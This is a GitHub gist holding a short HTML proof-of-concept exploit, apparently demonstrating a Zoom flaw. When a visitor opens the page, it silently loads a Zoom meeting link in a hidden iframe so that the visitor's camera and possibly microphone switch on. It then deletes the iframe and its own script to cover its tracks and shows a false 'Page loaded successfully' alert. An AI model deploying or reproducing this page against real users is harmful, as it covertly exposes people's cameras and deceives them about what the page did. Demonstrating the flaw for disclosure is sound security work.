Skip to content

Instantly share code, notes, and snippets.

@JangoSteve
Created July 9, 2019 16:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JangoSteve/2e8bf17dc5029b2cddd2e68a03e2d103 to your computer and use it in GitHub Desktop.
Save JangoSteve/2e8bf17dc5029b2cddd2e68a03e2d103 to your computer and use it in GitHub Desktop.
<body>
<h1>Totally not a phishing site to enable your camera and possibly microphone</h1>
<script>
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "https://zoom.us/j/492468757";
document.body.appendChild(iframe);
setTimeout( function() {
iframe.parentNode.removeChild(iframe);
var script = document.querySelector('script');
script.parentNode.removeChild(script);
alert("Page loaded successfully");
}, 5100);
</script>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment